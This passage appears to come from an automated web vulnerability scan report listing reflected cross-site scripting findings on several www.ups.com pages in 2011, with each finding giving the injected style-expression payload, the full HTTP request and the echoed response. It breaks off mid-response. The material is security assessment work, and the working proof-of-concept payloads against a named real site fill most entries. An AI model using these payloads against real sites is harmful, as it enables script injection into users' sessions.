The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b6f6"style%3d"x%3aexpression(alert(1))"c09d8225dde was submitted in the REST URL parameter 3. This input was echoed as 8b6f6"style="x:expression(alert(1))"c09d8225dde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en8b6f6"style%3d"x%3aexpression(alert(1))"c09d8225dde/freight/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en8b6f6"style="x:expression(alert(1))"c09d8225dde/freight/index.html">
...[SNIP]...

1.332. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/ocean_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8dd"style%3d"x%3aexpression(alert(1))"fffaad3b696 was submitted in the REST URL parameter 2. This input was echoed as 8a8dd"style="x:expression(alert(1))"fffaad3b696 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us8a8dd"style%3d"x%3aexpression(alert(1))"fffaad3b696/en/freight/ocean_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:02 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38501

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us8a8dd"style="x:expression(alert(1))"fffaad3b696/en/freight/ocean_freight.html">
...[SNIP]...

1.333. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/ocean_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b9c"style%3d"x%3aexpression(alert(1))"35cba245cf4 was submitted in the REST URL parameter 3. This input was echoed as 17b9c"style="x:expression(alert(1))"35cba245cf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en17b9c"style%3d"x%3aexpression(alert(1))"35cba245cf4/freight/ocean_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38501

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en17b9c"style="x:expression(alert(1))"35cba245cf4/freight/ocean_freight.html">
...[SNIP]...

1.334. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/road_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb8ff"style%3d"x%3aexpression(alert(1))"0fcdf3c310f was submitted in the REST URL parameter 2. This input was echoed as fb8ff"style="x:expression(alert(1))"0fcdf3c310f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usfb8ff"style%3d"x%3aexpression(alert(1))"0fcdf3c310f/en/freight/road_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37911

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usfb8ff"style="x:expression(alert(1))"0fcdf3c310f/en/freight/road_freight.html">
...[SNIP]...

1.335. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/road_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa4d4"style%3d"x%3aexpression(alert(1))"2cc934cd1f8 was submitted in the REST URL parameter 3. This input was echoed as aa4d4"style="x:expression(alert(1))"2cc934cd1f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enaa4d4"style%3d"x%3aexpression(alert(1))"2cc934cd1f8/freight/road_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:58 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37911

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enaa4d4"style="x:expression(alert(1))"2cc934cd1f8/freight/road_freight.html">
...[SNIP]...

1.336. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/index.jsx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b59c3"style%3d"x%3aexpression(alert(1))"cb5adea911c was submitted in the REST URL parameter 2. This input was echoed as b59c3"style="x:expression(alert(1))"cb5adea911c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usb59c3"style%3d"x%3aexpression(alert(1))"cb5adea911c/en/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:59 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124319

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usb59c3"style="x:expression(alert(1))"cb5adea911c/en/index.jsx">
...[SNIP]...

1.337. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/index.jsx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2732"style%3d"x%3aexpression(alert(1))"04a1cbd1897 was submitted in the REST URL parameter 3. This input was echoed as c2732"style="x:expression(alert(1))"04a1cbd1897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enc2732"style%3d"x%3aexpression(alert(1))"04a1cbd1897/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:00 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124319

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enc2732"style="x:expression(alert(1))"04a1cbd1897/index.jsx">
...[SNIP]...

1.338. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/locations/alliances/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c56a"style%3d"x%3aexpression(alert(1))"c7ff244ebad was submitted in the REST URL parameter 2. This input was echoed as 8c56a"style="x:expression(alert(1))"c7ff244ebad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us8c56a"style%3d"x%3aexpression(alert(1))"c7ff244ebad/en/locations/alliances/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33734

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us8c56a"style="x:expression(alert(1))"c7ff244ebad/en/locations/alliances/index.html">
...[SNIP]...

1.339. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/locations/alliances/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66bf6"style%3d"x%3aexpression(alert(1))"eb049b5ef2a was submitted in the REST URL parameter 3. This input was echoed as 66bf6"style="x:expression(alert(1))"eb049b5ef2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en66bf6"style%3d"x%3aexpression(alert(1))"eb049b5ef2a/locations/alliances/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33734

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en66bf6"style="x:expression(alert(1))"eb049b5ef2a/locations/alliances/index.html">
...[SNIP]...

1.340. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/locations/aso/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a18c"style%3d"x%3aexpression(alert(1))"85469569a7f was submitted in the REST URL parameter 2. This input was echoed as 9a18c"style="x:expression(alert(1))"85469569a7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us9a18c"style%3d"x%3aexpression(alert(1))"85469569a7f/en/locations/aso/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9a18c"style="x:expression(alert(1))"85469569a7f/en/locations/aso/index.html">
...[SNIP]...

1.341. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/locations/aso/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71006"style%3d"x%3aexpression(alert(1))"fb54cd13bc5 was submitted in the REST URL parameter 3. This input was echoed as 71006"style="x:expression(alert(1))"fb54cd13bc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en71006"style%3d"x%3aexpression(alert(1))"fb54cd13bc5/locations/aso/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en71006"style="x:expression(alert(1))"fb54cd13bc5/locations/aso/index.html">
...[SNIP]...

1.342. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/locations/custcenters/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992bd"style%3d"x%3aexpression(alert(1))"fc1c542d606 was submitted in the REST URL parameter 2. This input was echoed as 992bd"style="x:expression(alert(1))"fc1c542d606 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us992bd"style%3d"x%3aexpression(alert(1))"fc1c542d606/en/locations/custcenters/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36791

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us992bd"style="x:expression(alert(1))"fc1c542d606/en/locations/custcenters/index.html">
...[SNIP]...

1.343. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/locations/custcenters/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84cea"style%3d"x%3aexpression(alert(1))"fabf1550216 was submitted in the REST URL parameter 3. This input was echoed as 84cea"style="x:expression(alert(1))"fabf1550216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en84cea"style%3d"x%3aexpression(alert(1))"fabf1550216/locations/custcenters/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36791

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en84cea"style="x:expression(alert(1))"fabf1550216/locations/custcenters/index.html">
...[SNIP]...

1.344. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/locations/dropboxes/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3203e"style%3d"x%3aexpression(alert(1))"21d9c88cca3 was submitted in the REST URL parameter 2. This input was echoed as 3203e"style="x:expression(alert(1))"21d9c88cca3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us3203e"style%3d"x%3aexpression(alert(1))"21d9c88cca3/en/locations/dropboxes/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37057

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us3203e"style="x:expression(alert(1))"21d9c88cca3/en/locations/dropboxes/index.html">
...[SNIP]...

1.345. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/locations/dropboxes/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e791a"style%3d"x%3aexpression(alert(1))"af78a44ca5c was submitted in the REST URL parameter 3. This input was echoed as e791a"style="x:expression(alert(1))"af78a44ca5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ene791a"style%3d"x%3aexpression(alert(1))"af78a44ca5c/locations/dropboxes/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37057

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ene791a"style="x:expression(alert(1))"af78a44ca5c/locations/dropboxes/index.html">
...[SNIP]...

1.346. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/locations/store/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0680"style%3d"x%3aexpression(alert(1))"8203c807817 was submitted in the REST URL parameter 2. This input was echoed as f0680"style="x:expression(alert(1))"8203c807817 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usf0680"style%3d"x%3aexpression(alert(1))"8203c807817/en/locations/store/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf0680"style="x:expression(alert(1))"8203c807817/en/locations/store/index.html">
...[SNIP]...

1.347. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/locations/store/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ad9"style%3d"x%3aexpression(alert(1))"f95a058444a was submitted in the REST URL parameter 3. This input was echoed as a7ad9"style="x:expression(alert(1))"f95a058444a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ena7ad9"style%3d"x%3aexpression(alert(1))"f95a058444a/locations/store/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
